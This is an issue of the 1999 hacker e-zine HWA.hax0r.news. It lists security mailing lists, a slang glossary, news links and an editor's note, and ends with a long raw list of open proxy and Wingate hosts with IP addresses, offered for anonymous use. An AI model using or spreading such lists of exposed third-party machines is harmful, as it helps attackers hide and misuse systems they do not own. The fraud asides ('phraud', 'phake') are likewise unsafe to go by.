Bugtraq is a full-disclosure UNIX security mailing list, (see the info
file) started by Scott Chasin <chasin@crimelab.com>. To subscribe to
bugtraq, send mail to listserv@netspace.org containing the message body
subscribe bugtraq. I've been archiving this list on the web since late
1993. It is searchable with glimpse and archived on-the-fly with hypermail.
Searchable Hypermail Index;
http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html
About the Bugtraq mailing list
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The following comes from Bugtraq's info file:
This list is for *detailed* discussion of UNIX security holes: what they are,
how to exploit, and what to do to fix them.
This list is not intended to be about cracking systems or exploiting their
vulnerabilities. It is about defining, recognizing, and preventing use of
security holes and risks.
Please refrain from posting one-line messages or messages that do not contain
any substance that can relate to this list`s charter.
I will allow certain informational posts regarding updates to security tools,
documents, etc. But I will not tolerate any unnecessary or nonessential "noise"
on this list.
Please follow the below guidelines on what kind of information should be posted
to the Bugtraq list:
+ Information on Unix related security holes/backdoors (past and present)
+ Exploit programs, scripts or detailed processes about the above
+ Patches, workarounds, fixes
+ Announcements, advisories or warnings
+ Ideas, future plans or current works dealing with Unix security
+ Information material regarding vendor contacts and procedures
+ Individual experiences in dealing with above vendors or security organizations
+ Incident advisories or informational reporting
Any non-essential replies should not be directed to the list but to the originator of the message. Please do not
"CC" the bugtraq reflector address if the response does not meet the above criteria.
Remember: YOYOW.
You own your own words. This means that you are responsible for the words that you post on this list and that
reproduction of those words without your permission in any medium outside the distribution of this list may be
challenged by you, the author.
For questions or comments, please mail me:
chasin@crimelab.com (Scott Chasin)
UPDATED Sept/99 - Sent in by Androthi, tnx for the update
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
I am pleased to inform you of several changes that will be occurring
on June 5th. I hope you find them as exciting as I do.
BUGTRAQ moves to a new home
---------------------------
First, BUGTRAQ will be moving from its current home at NETSPACE.ORG
to SECURITYFOCUS.COM. What is Security Focus you ask? Wait and read
below. Other than the change of domains nothing of how the list
is run changes. I am still the moderator. We play by the same rules.
Security Focus will be providing mail archives for BUGTRAQ. The
archives go back longer than Netspace's and are more complete than
Geek-Girl's.
The move will occur one week from today. You will not need to
resubscribe. All your information, including subscription options
will be moved transparently.
Any of you using mail filters (e.g. procmail) to sort incoming
mail into mail folders by examining the From address will have to
update them to include the new address. The new address will be:
BUGTRAQ@SECURITYFOCUS.COM
Security Focus also be providing a free searchable vulnerability
database.
BUGTRAQ es muy bueno
--------------------
It has also become apparent that there is a need for forums
in the spirit of BUGTRAQ where non-English speaking people
or people that don't feel comfortable speaking English can
exchange information.
As such I've decided to give BUGTRAQ in other languages a try.
BUGTRAQ will continue to be the place to submit vulnerability
information, but if you feel more comfortable using some other
language you can give the other lists a try. All relevant information
from the other lists which have not already been covered here
will be translated and forwarded on by the list moderator.
In the next couple of weeks we will be introducing BUGTRAQ-JP
(Japanese) which will be moderated by Nobuo Miwa <n-miwa@lac.co.jp>
and BUGTRAQ-SP (Spanish) which will be moderated by CORE SDI S.A.
from Argentina <http://www.core-sdi.com/> (the folks that brought you
Secure Syslog and the SSH insertion attack).
What is Security Focus?
-----------------------
Security Focus is an exercise in creating a community and a security
resource. We hope to be able to provide a medium where useful and
successful resources such as BUGTRAQ can occur, while at the same
time providing a comprehensive source of security information. Aside
from moving just BUGTRAQ over, the Geek-Girl archives (and the Geek Girl
herself!) have moved over to Security Focus to help us with building
this new community. The other staff at Security Focus are largely derived
from long time supporters of Bugtraq and the community in general. If
you are interested in viewing the staff pages, please see the 'About'
section on www.securityfocus.com.
On the community creating front you will find a set of forums
and mailing lists we hope you will find useful. A number of them
are not scheduled to start for several weeks but starting today
the following list is available:
* Incidents' Mailing List. BUGTRAQ has always been about the
discussion of new vulnerabilities. As such I normally don't approve
messages about break-ins, trojans, viruses, etc with the exception
of wide spread cases (Melissa, ADM worm, etc). The other choice
people are usually left with is email CERT but this fails to
communicate this important information to other that may be
potentially affected.
The Incidents mailing list is a lightly moderated mailing list to
facilitate the quick exchange of security incident information.
Topical items include such things as information about rootkits
new trojan horses and viruses, source of attacks and tell-tale
signs of intrusions.
To subscribe email LISTSERV@SECURITYFOCUS.COM with a message body
of:
SUBS INCIDENTS FirstName, LastName
Shortly we'll also be introducing an Information Warfare forum along
with ten other forums over the next two months. These forums will be
built and moderated by people in the community as well as vendors who
are willing to take part in the community building process.
*Note to the vendors here* We have several security vendors who have
agreed to run forums where they can participate in the online communities.
If you would like to take part as well, mail Alfred Huger,
ahuger@securityfocus.com.
On the information resource front you find a large database of
the following:
* Vulnerabilities. We are making accessible a free vulnerability
database. You can search it by vendor, product and keyword. You
will find detailed information on the vulnerability and how to fix it,
as well are links to reference information such as email messages,
advisories and web pages. You can search by vendor, product and
keywords. The database itself is the result of culling through 5
years of BUGTRAQ plus countless other lists and news groups. It's
a shining example of how thorough full disclosure has made a significant
impact on the industry over the last half decade.
* Products. An incredible number of categorized security products
from over two hundred different vendors.
* Services. A large and focused directory of security services offered by
vendors.
* Books, Papers and Articles. A vast number of categorized security
related books, papers and articles. Available to download directly
for our servers when possible.
* Tools. A large array of free security tools. Categorized and
available for download.
* News: A vast number of security news articles going all the way
back to 1995.
* Security Resources: A directory to other security resources on
the net.
As well as many other things such as an event calendar.
For your convenience the home-page can be personalized to display
only information you may be interested in. You can filter by
categories, keywords and operating systems, as well as configure
how much data to display.
I'd like to thank the fine folks at NETSPACE for hosting the
site for as long as they have. Their services have been invaluable.
I hope you find these changes for the best and the new services
useful. I invite you to visit http://www.securityfocus.com/ and
check it out for yourself. If you have any comments or suggestions
please feel free to contact me at this address or at
aleph1@securityfocus.com.
Cheers.
--
Aleph One / aleph1@underground.org
http://underground.org/
KeyID 1024/948FD6B5
Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01
Crypto-Gram
~~~~~~~~~~~
CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses,
insights, and commentaries on cryptography and computer security.
To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a
blank message to crypto-gram-subscribe@chaparraltree.com. To unsubscribe,
visit http://www.counterpane.com/unsubform.html. Back issues are available
on http://www.counterpane.com.
CRYPTO-GRAM is written by Bruce Schneier. Schneier is president of
Counterpane Systems, the author of "Applied Cryptography," and an inventor
of the Blowfish, Twofish, and Yarrow algorithms. He served on the board of
the International Association for Cryptologic Research, EPIC, and VTW. He
is a frequent writer and lecturer on cryptography.
CUD Computer Underground Digest
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This info directly from their latest ish:
Computer underground Digest Sun 14 Feb, 1999 Volume 11 : Issue 09
ISSN 1004-042X
Editor: Jim Thomas (cudigest@sun.soci.niu.edu)
News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)
Archivist: Brendan Kehoe
Poof Reader: Etaion Shrdlu, Jr.
Shadow-Archivists: Dan Carosone / Paul Southworth
Ralph Sims / Jyrki Kuoppala
Ian Dickinson
Cu Digest Homepage: http://www.soci.niu.edu/~cudigest
[ISN] Security list
~~~~~~~~~~~~~~~~~~~
This is a low volume list with lots of informative articles, if I had my
way i'd reproduce them ALL here, well almost all .... ;-) - Ed
UPDATED Sept/99 - Sent in by Androthi, tnx for the update
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
--[ New ISN announcement (New!!)
Sender: ISN Mailing List <ISN@SECURITYFOCUS.COM>
From: mea culpa <jericho@DIMENSIONAL.COM>
Subject: Where has ISN been?
Comments: To: InfoSec News <isn@securityfocus.com>
To: ISN@SECURITYFOCUS.COM
It all starts long ago, on a network far away..
Not really. Several months ago the system that hosted the ISN mail list
was taken offline. Before that occured, I was not able to retrieve the
subscriber list. Because of that, the list has been down for a while. I
opted to wait to get the list back rather than attempt to make everyone
resubscribe.
As you can see from the headers, ISN is now generously being hosted by
Security Focus [www.securityfocus.com]. THey are providing the bandwidth,
machine, and listserv that runs the list now.
Hopefully, this message will find all ISN subscribers, help us weed out
dead addresses, and assure you the list is still here. If you have found
the list to be valuable in the past, please tell friends and associates
about the list. To subscribe, mail listserv@securityfocus.com with
"subscribe isn firstname lastname". To unsubscribe, "unsubscribe isn".
As usual, comments and suggestions are welcome. I apologize for the down
time of the list. Hopefully it won't happen again. ;)
mea_culpa
www.attrition.org
--[ Old ISN welcome message
[Last updated on: Mon Nov 04 0:11:23 1998]
InfoSec News is a privately run, medium traffic list that caters
to distribution of information security news articles. These
articles will come from newspapers, magazines, online resources,
and more.
The subject line will always contain the title of the article, so that
you may quickly and effeciently filter past the articles of no interest.
This list will contain:
o Articles catering to security, hacking, firewalls, new security
encryption, products, public hacks, hoaxes, legislation affecting
these topics and more.
o Information on where to obtain articles in current magazines.
o Security Book reviews and information.
o Security conference/seminar information.
o New security product information.
o And anything else that comes to mind..
Feedback is encouraged. The list maintainers would like to hear what
you think of the list, what could use improving, and which parts
are "right on". Subscribers are also encouraged to submit articles
or URLs. If you submit an article, please send either the URL or
the article in ASCII text. Further, subscribers are encouraged to give
feedback on articles or stories, which may be posted to the list.
Please do NOT:
* subscribe vanity mail forwards to this list
* subscribe from 'free' mail addresses (ie: juno, hotmail)
* enable vacation messages while subscribed to mail lists
* subscribe from any account with a small quota
All of these generate messages to the list owner and make tracking
down dead accounts very difficult. I am currently receiving as many
as fifty returned mails a day. Any of the above are grounds for
being unsubscribed. You are welcome to resubscribe when you address
the issue(s).
Special thanks to the following for continued contribution:
William Knowles, Aleph One, Will Spencer, Jay Dyson,
Nicholas Brawn, Felix von Leitner, Phreak Moi and
other contributers.
ISN Archive: ftp://ftp.repsec.com/pub/text/digests/isn
ISN Archive: http://www.landfield.com/isn
ISN Archive: http://www.jammed.com/Lists/ISN/
ISN is Moderated by 'mea_culpa' <jericho@dimensional.com>. ISN is a
private list. Moderation of topics, member subscription, and
everything else about the list is solely at his discretion.
The ISN membership list is NOT available for sale or disclosure.
ISN is a non-profit list. Sponsors are only donating to cover bandwidth
and server costs.
Win2k Security Advice Mailing List (new added Nov 30th)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
To subscribe:
send "SUBSCRIBE WIN2KSECADVICE anonymous or name" in the message body
to listserv@listserv.ntsecurity.net
Welcome to Win2K Security Advice! Thank you for subscribing. If you have any
questions or comments about the list please feel free to contact the list
moderator, Steve Manzuik, at steve@win2ksecadvice.net.
To see what you've missed recently on the list, or to research an item
of interest, be sure to visit the Web-based archives located at:
http://www.ntsecurity.net/scripts/page_listserv.asp?s=win2ksec
==============
NTSecurity.net brings the security community a brand new (Oct 99) and
much-requested Windows security mailing list. This new moderated mailing list,
Win2KSecAdvice (formerly NTSecAdvice,) is geared towards promoting the open
discussion of Windows-related security issues.
With a firm and unwavering commitment towards timely full disclosure, this
new resource promises to become a great forum for open discussion
regarding security-related bugs, vulnerabilities, potential exploits, virus,
worms, Trojans, and more. Win2KSecAdvice promotes a strong sense of community
and we openly invite all security minded individuals, be they white hat,
gray hat, or black hat, to join the new mailing list.
While Win2KSecAdvice was named in the spirit of Microsoft's impending product
line name change, and meant to reflect the list's security focus both now and
in the long run, it is by no means limited to security topics centered around
Windows 2000. Any security issues that pertain to Windows-based networking are
relevant for discussion, including all Windows operating systems, MS Office,
MS BackOffice, and all related third party applications and hardware.
The scope of Win2KSecAdvice can be summarized very simply: if it's relevant to
a security risk, it's relevant to the list.
The list archives are available on the Web at http://www.ntsecurity.net,
which include a List Charter and FAQ, as well as Web-based searchable list
archives for your research endeavors.
SAVE THIS INFO FOR YOUR REFERENCE:
To post to the list simply send your email to
win2ksecadvice@listserv.ntsecurity.net
To unsubscribe from this list, send UNSUBSCRIBE WIN2KSECADVICE to
listserv@listserv.ntsecurity.net
Regards,
Steve Manzuik, List Moderator
Win2K Security Advice
steve@win2ksecadvice.net
@HWA
00.3 THIS IS WHO WE ARE
~~~~~~~~~~~~~~~~~~
__ ___ ___
\ \ / / |__ ___ __ _ _ __ _____ ____|__ \
\ \ /\ / /| '_ \ / _ \ / _` | '__/ _ \ \ /\ / / _ \/ /
\ V V / | | | | (_) | (_| | | | __/\ V V / __/_|
\_/\_/ |_| |_|\___/ \__,_|_| \___| \_/\_/ \___(_)
Some HWA members and Legacy staff
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
cruciphux@dok.org.........: currently active/editorial
darkshadez@ThePentagon.com: currently active/man in black
fprophet@dok.org..........: currently active/programming/IRC+ man in black
sas2@usa.net .............. currently active/IRC+ distribution
vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black
dicentra...(email withheld): IRC+ grrl in black
twisted-pair@home.com......: currently active/programming/IRC+
Foreign Correspondants/affiliate members (Active)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Qubik ............................: United Kingdom
D----Y ...........................: USA/world media
Zym0t1c ..........................: Dutch/Germany/Europe
Sla5h.............................: Croatia
HWA members ......................: World Media
Past Foreign Correspondants (currently inactive or presumed dead)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
N0Portz ..........................: Australia
system error .....................: Indonesia
Wile (wile coyote) ...............: Japan/the East
Ruffneck ........................: Netherlands/Holland
Wyze1.............................: South Africa
Please send in your sites for inclusion here if you haven't already
also if you want your emails listed send me a note ... - Ed
Spikeman's site is down as of this writing, if it comes back online it will be
posted here.
http://www.hackerlink.or.id/ ............ System Error's site (in Indonesian)
Sla5h's email: smuddo@yahoo.com
*******************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen' ***
*******************************************************************
:-p
1. We do NOT work for the government in any shape or form.Unless you count paying
taxes ... in which case we work for the gov't in a BIG WAY. :-/
2. MOSTLY Unchanged since issue #1, although issues are a digest of recent news
events its a good idea to check out issue #1 at least and possibly also the
Xmas issue for a good feel of what we're all about otherwise enjoy - Ed ...
@HWA
00.4 Whats in a name? why HWA.hax0r.news??
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Well what does HWA stand for? never mind if you ever find out I may
have to get those hax0rs from 'Hackers' or the Pretorians after you.
In case you couldn't figure it out hax0r is "new skewl" and although
it is laughed at, shunned, or even pidgeon holed with those 'dumb
leet (l33t?) dewds' <see article in issue #4> this is the state
of affairs. It ain't Stephen Levy's HACKERS anymore. BTW to all you
up and comers, i'd highly recommend you get that book. Its almost
like buying a clue. Anyway..on with the show .. - Editorial staff
@HWA
00.5 HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
_ ___ ___ _____ _ ___
| | | \ \ / / \ | ___/ \ / _ \
| |_| |\ \ /\ / / _ \ | |_ / _ \| | | |
| _ | \ V V / ___ \ _| _/ ___ \ |_| |
|_| |_| \_/\_/_/ \_(_)_|/_/ \_\__\_\
Also released in issue #3. (revised) check that issue for the faq
it won't be reprinted unless changed in a big way with the exception
of the following excerpt from the FAQ, included to assist first time
readers:
Some of the stuff related to personal useage and use in this zine are
listed below: Some are very useful, others attempt to deny the any possible
attempts at eschewing obfuscation by obsucuring their actual definitions.
@HWA - see EoA ;-)
!= - Mathematical notation "is not equal to" or "does not equal"
ASC(247) "wavey equals" sign means "almost equal" to. If written
an =/= (equals sign with a slash thru it) also means !=, =< is Equal
to or less than and => is equal to or greater than (etc, this aint
fucking grade school, cripes, don't believe I just typed all that..)
AAM - Ask a minor (someone under age of adulthood, usually <16, <18 or <21)
AOL - A great deal of people that got ripped off for net access by a huge
clueless isp with sekurity that you can drive buses through, we're
not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the
least they could try leasing one??
*CC - 1 - Credit Card (as in phraud)
2 - .cc is COCOS (Keeling) ISLANDS butthey probably accept cc's
CCC - Chaos Computer Club (Germany)
*CON - Conference, a place hackers crackers and hax0rs among others go to swap
ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get drunk
watch videos and seminars, get drunk, listen to speakers, and last but
not least, get drunk.
*CRACKER - 1 . Someone who cracks games, encryption or codes, in popular hacker
speak he's the guy that breaks into systems and is often (but by no
means always) a "script kiddie" see pheer
2 . An edible biscuit usually crappy tasting without a nice dip, I like
jalapeno pepper dip or chives sour cream and onion, yum - Ed
Ebonics - speaking like a rastafarian or hip dude of colour <sic> also wigger
Vanilla Ice is a wigger, The Beastie Boys and rappers speak using
ebonics, speaking in a dark tongue ... being ereet, see pheer
EoC - End of Commentary
EoA - End of Article or more commonly @HWA
EoF - End of file
EoD - End of diatribe (AOL'ers: look it up)
FUD - Coined by Unknown and made famous by HNN <g> - "Fear uncertainty and doubt",
usually in general media articles not high brow articles such as ours or other
HNN affiliates ;)
du0d - a small furry animal that scurries over keyboards causing people to type
weird crap on irc, hence when someone says something stupid or off topic
'du0d wtf are you talkin about' may be used.
*HACKER - Read Stephen Levy's HACKERS for the true definition, then see HAX0R
*HAX0R - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to
define, I think it is best defined as pop culture's view on The Hacker ala
movies such as well erhm "Hackers" and The Net etc... usually used by "real"
hackers or crackers in a derogatory or slang humorous way, like 'hax0r me
some coffee?' or can you hax0r some bread on the way to the table please?'
2 - A tool for cutting sheet metal.
HHN - Maybe a bit confusing with HNN but we did spring to life around the same
time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper
noun means the hackernews site proper. k? k. ;&
HNN - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html
J00 - "you"(as in j00 are OWN3D du0d) - see 0wn3d
MFI/MOI- Missing on/from IRC
NFC - Depends on context: No Further Comment or No Fucking Comment
NFR - Network Flight Recorder (Do a websearch) see 0wn3d
NFW - No fuckin'way
*0WN3D - You are cracked and owned by an elite entity see pheer
*OFCS - Oh for christ's sakes
PHACV - And variations of same <coff>
Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, Warfare
Alternates: H - hacking, hacktivist
C - Cracking <software>
C - Cracking <systems hacking>
V - Virus
W - Warfare <cyberwarfare usually as in Jihad>
A - Anarchy (explosives etc, Jolly Roger's Cookbook etc)
P - Phreaking, "telephone hacking" PHone fREAKs ...
CT - Cyber Terrorism
*PHEER - This is what you do when an ereet or elite person is in your presence
see 0wn3d
*RTFM - Read the fucking manual - not always applicable since some manuals are
pure shit but if the answer you seek is indeed in the manual then you
should have RTFM you dumb ass.
TBC - To Be Continued also 2bc (usually followed by ellipses...) :^0
TBA - To Be Arranged/To Be Announced also 2ba
TFS - Tough fucking shit.
*w00t - 1 - Reserved for the uber ereet, noone can say this without severe repercussions
from the underground masses. also "w00ten" <sic>
2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers)
*wtf - what the fuck, where the fuck, when the fuck etc ..
*ZEN - The state you reach when you *think* you know everything (but really don't)
usually shortly after reaching the ZEN like state something will break that
you just 'fixed' or tweaked.
@HWA
-=- :. .: -=-
01.0 Greets!?!?! yeah greets! w0w huh. - Ed
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
____ _
/ ___|_ __ ___ ___| |_ ___
| | _| '__/ _ \/ _ \ __/ __|
| |_| | | | __/ __/ |_\__ \
\____|_| \___|\___|\__|___/
Thanks to all in the community for their support and interest but i'd
like to see more reader input, help me out here, whats good, what sucks
etc, not that I guarantee i'll take any notice mind you, but send in
your thoughts anyway.
* all the people who sent in cool emails and support
FProphet Pyra TwstdPair _NeM_
D----Y Dicentra vexxation sAs72
Spikeman p0lix Vortexia Wyze1
Pneuma Raven Zym0t1c duro
Repluzer astral BHZ ScrewUp
Qubik gov-boi _Jeezus_ Haze_
thedeuce ytcracker loophole BlkOps
Folks from #hwa.hax0r,news and #fawkerz, and other leet
secret channels ... ;-)
Ken Williams/tattooman ex-of PacketStorm,
& Kevin Mitnick
kewl sites:
+ http://www.hack.co.za NEW
+ http://blacksun.box.sk. NEW
+ http://packetstorm.securify.com/ NEW
+ http://www.securityportal.com/ NEW
+ http://www.securityfocus.com/ NEW
+ http://www.hackcanada.com/
+ http://www.l0pht.com/
+ http://www.2600.com/
+ http://www.freekevin.com/
+ http://www.genocide2600.com/
+ http://www.hackernews.com/ (Went online same time we started issue 1!)
+ http://www.net-security.org/
+ http://www.slashdot.org/
+ http://www.freshmeat.net/
+ http://www.403-security.org/
+ http://ech0.cjb.net/
@HWA
01.1 Last minute stuff, rumours and newsbytes
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"What is popular isn't always right, and what is right isn't
always popular..."
- FProphet '99
+++ When was the last time you backed up your important data?
++ Hackers: Governments hacks pointless
Contributed by Zym0t1c
The Feds aren't the only ones who don't approve of hacker attacks on several
government Web sites. Some hackers are also condemning the exploits,
calling them juvenile and pointless.
Read the article at:
http://www.zdnet.com/zdnn/stories/news/0,4586,2269312,00.html?chkpt=zdnnsmsa
++ Hackers say they'll take off New Year's
Contributed by Zym0t1c
Two hacking groups have struck again, defacing several Web pages around the
Internet. This time, however, they have a message for others looking to
circumvent security on the Net: Don't hack over the New Year's weekend.
Read the article at:
http://www.zdnet.com/zdnn/stories/news/0,4586,2413134,00.html
++ A Hacker Christmas
Contributed by Zym0t1c
Last-minute gift purchases for the hacker in the house, by Kevin Poulsen.
Read the article at:
http://www.zdnet.com/zdtv/cybercrime/chaostheory/story/0,3700,2412532,00.html?chkpt=zdnnsmsa
++ Government asks hackers for Y2K break
Contributed by Zym0t1c
WASHINGTON - President Clinton's top aide on Y2K matters has urged computer
hackers to exercise self-restraint until after year 2000 technology fears
largely have passed.
Read the article at:
http://www.zdnet.com/zdnn/stories/news/0,4586,2408969,00.html?chkpt=zdnnsmsa
++ 'Net Attack' program threatens Internet sites
Contributed by Zym0t1c
Just before New Year, a new version of the so called 'Net Attack' or Tribe
Flood Network (TFN) program was released. This version, TFN2K, is much more
powerful and more difficult to detect. Experts fear that hackers will use
TFN to hack into networks while everybody is celebrating New Year.
Read the dutch article at:
http://www.zdnet-be.com/zdbe.asp?ch=NI&artid=3749
Thanks to myself for providing the info from my wired news feed and others from whatever
sources, also to Spikeman for sending in past entries.... - Ed
@HWA
01.2 MAILBAG - email and posts from the message board worthy of a read
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Yeah we have a message board, feel free to use it, remember there are no stupid questions...
well there are but if you ask something really dumb we'll just laugh at ya, lets give the
message board a bit more use eh? i'll be using a real message board when the hwa-iwa.org
domain comes back online (soon) meanwhile the beseen board is still up...
==============================================================================
02.0 From the editor.
~~~~~~~~~~~~~~~~
#include <stdio.h>
#include <thoughts.h>
#include <backup.h>
main()
{
printf ("Read commented source!\n\n");
/*
* w00t merry Christmas, Happy Hannukah or however the
* fuck you spell it and Merry Yuletide etc etc oh ya
* and Ramadan (Yeah I know its not this time of year
* whatever, religion isn't what this is about), anyway
* happy holidays and enjoy a new fun packed issue of HWA
* complete with yer favourite info and proxy lists, smurf
* amplifiers and some leet exploits.... werd up, and
* get securing those boxes! hope you don't get called in
* to fix script-kiddy damage over the holidays!
*
* Cruci
*
* cruciphux@dok.org
* ICQ:58939315 note; not always online, do not abuse!
* Preffered chat method: IRC Efnet in #HWA.hax0r.news
*
*/
printf ("EoF.\n");
}
Snailmail:
HWA NEWS
P.O BOX 44118
370 MAIN ST. NORTH
BRAMPTON, ONTARIO
CANADA
L6V 4H5
Congrats, thanks, articles, news submissions and kudos to us at the
main address: hwa@press.usmc.net complaints and all nastygrams and
mai*lbombs can go to /dev/nul nukes, synfloods and papasmurfs to
127.0.0.1, private mail to cruciphux@dok.org
danke.
C*:.
-= start =--= start =--= start =--= start =--= start =--= start =--= start
____ _ _
/ ___|___ _ __ | |_ ___ _ __ | |_
| | / _ \| '_ \| __/ _ \ '_ \| __|
| |__| (_) | | | | || __/ | | | |_
\____\___/|_| |_|\__\___|_| |_|\__|
/ ___|| |_ __ _ _ __| |_
\___ \| __/ _` | '__| __|
___) | || (_| | | | |_
|____/ \__\__,_|_| \__|
-= start =--= start =--= start =--= start =--= start =--= start =--=
Tip of the week: .us domains are free of charge to register.
http://www.nic.us/usdom-overview.html#Cost of course you need
to be in the .us to use this (or figure out a way to phake it) *g*
03.0 Socks proxies, Wingates and more from IRC4ALL
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Contributed by: HWA Staff (Yeah -Ed :-p)
WELL MAINTAINED and updated site. Check it out for proxy info.
highly recommended - Ed.
This site is located at http://www.lightspeed.de/irc4all/
No formatting, data is presented raw direct from site.
Most proxies are socks4 or 5, wingates are 4, ports are
commonly 1080 or 8080 if you don't know how to use these
don't use them! - Ed
Common ports for proxy use:
Port Wingate service
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
21 FTP Proxy Server
23 Telnet Proxy Server
53 DNS Proxy Server
80 WWW Proxy Server
110 POP3 Proxy Server
808 Remote Control Service
1080 SOCKS Proxy Server
1090 Real Audio Proxy Server
7000 VDOlive Proxy Server
8000 XDMA Proxy Server
8010 Log Service
Not all services will work on all proxies/wingates, you will have to play
with them and try them out. Also admins close these down frequently but
there ARE active useable proxies on the following lists, Play nice and
don't over use or abuse. - Ed
NotFound,200.36.19.225,
NotFound,206.103.12.131,
NotFound,210.56.18.225,
NotFound,210.56.18.226,
NotFound,210.56.18.241,
NotFound,200.248.68.129,
NotFound,210.56.18.253,
NotFound,200.248.69.50,
noeljo9.lnk.telstra.net,139.130.54.153,
modemcable215.2-200-24.hull.mc.videotron.net,24.200.2.215,
edtn004203.hs.telusplanet.net,161.184.152.139,
NotFound,195.14.148.98,
blissr.lnk.telstra.net,139.130.54.131,
PPP46-166.lvsb.vsnl.net.in,202.54.46.166,
cr216724724.cable.net.co,216.72.47.24,
cr216724718.cable.net.co,216.72.47.18,
122-94.w3.com.uy,207.3.122.94,
saward.lnk.telstra.net,139.130.55.98,
icqtwsrv1.maiowoo.com,203.135.240.3,
NotFound,212.22.69.35,
122-85.w3.com.uy,207.3.122.85,
gw.eudynelson.com,207.176.25.66,
sis-zeus.sville.edu.ph,207.0.119.67,
dns-server1.tj.pa.gov.br,200.242.244.1,
theleu.lnk.telstra.net,139.130.74.160,
210-55-191-125.ipnets.xtra.co.nz,210.55.191.125,
nor24788-1.gw.connect.com.au,202.21.13.46,
NotFound,210.161.200.82,
www.slcr.cz,212.27.210.65,
NotFound,210.56.19.5,
northeastmicro.com,204.170.187.254,
NotFound,195.5.33.222,
marina.amakusa.gr.jp,210.164.238.50,
h0040053c7824.ne.mediaone.net,24.128.48.55,
NotFound,216.72.45.152,
tconl9076.tconl.com,204.26.90.76,
NotFound,193.227.185.210,
NotFound,194.243.99.199,
NotFound,202.54.48.85,
NotFound,200.21.157.61,
server.goway.com,205.206.42.162,
web.urudata.com.uy,207.3.122.84,
cr2167248104.cable.net.co,216.72.48.104,
frontier.netline.net.au,203.28.52.160,
interate.com.pe,209.45.73.174,
210-55-191-126.ipnets.xtra.co.nz,210.55.191.126,
com3058-2.gw.connect.com.au,202.21.8.108,
PPP46-254.lvsb.vsnl.net.in,202.54.46.254,
NotFound,195.14.148.99,
ibp.santa.krs.ru,195.161.57.133,
mail.theova.com,195.14.148.65,
cr2167254143.cable.net.co,216.72.54.143,
NotFound,142.250.6.2,
plebiscito.synapsis.it,195.31.227.14,
ipshome-gw.iwahashi.co.jp,210.164.242.146,
other.issei-dc.co.jp,210.164.241.99,
x1-6-00-60-b0-66-08-f7.cust.planetcable.net,24.137.18.44,
NotFound,209.177.38.98,
www.ymts.sakha.ru,194.186.182.2,
mail.ermanco.com,12.2.82.130,
mail1.bikesusa.com,207.176.25.114,
ewwmail.ozemail.com.au,203.108.128.242,
modemcable106.22-200-24.timi.mc.videotron.net,24.200.22.106,
patter.lnk.telstra.net,139.130.81.160,
server.hirup.khmelnitskiy.ua,195.230.134.227,
port58151.btl.net,206.153.58.151,
wdpcbalt.wdpc.com,208.222.211.65,
dns.gincorp.co.jp,210.164.86.34,
ts18.svamberk.cz,212.47.11.231,
mail.coolmore.com.au,203.12.145.98,
NotFound,195.14.148.101,
cr216724770.cable.net.co,216.72.47.70,
ip110.gte5.rb1.bel.nwlink.com,209.20.218.110,
ci272608-a.sptnbrg1.sc.home.com,24.4.115.144,
edsl78.mpls.uswest.net,209.181.225.79,
NotFound,210.114.231.130,
mooty.lnk.telstra.net,139.130.81.14,
NotFound,168.187.78.34,
NotFound,203.116.5.58,
c111.h202052116.is.net.tw,202.52.116.111,
cr2167251178.cable.net.co,216.72.51.178,
altona.lnk.telstra.net,139.130.80.123,
NotFound,139.130.59.187,
nevisco.city.tvnet.hu,195.38.100.242,
edtn003590.hs.telusplanet.net,161.184.150.34,
NotFound,193.15.227.125,
dns1.ctsjp.co.jp,210.172.87.146,
gaon.zg.szczecin.pl,195.116.25.98,
NotFound,195.5.33.218,
edtn003331.hs.telusplanet.net,161.184.149.29,
edtn003725.hs.telusplanet.net,161.184.150.169,
dt027n36.san.rr.com,24.30.137.54,
tsp-proxy.tsss.com,12.2.81.50,
austra53.lnk.telstra.net,139.130.56.114,
NotFound,195.161.69.65,
modemcable118.21-200-24.timi.mc.videotron.net,24.200.21.118,
cascad.lnk.telstra.net,139.130.44.197,
edtn003171.hs.telusplanet.net,161.184.148.123,
tob24399-1.gw.connect.com.au,202.21.14.234,
ad112-162.magix.com.sg,165.21.112.162,
NotFound,195.146.98.226,
NotFound,193.232.250.133,
lesy.vol.cz,212.27.211.5,
HSE-Montreal-ppp32859.qc.sympatico.ca,216.209.195.103,
north.ocs.k12.al.us,216.77.56.66,
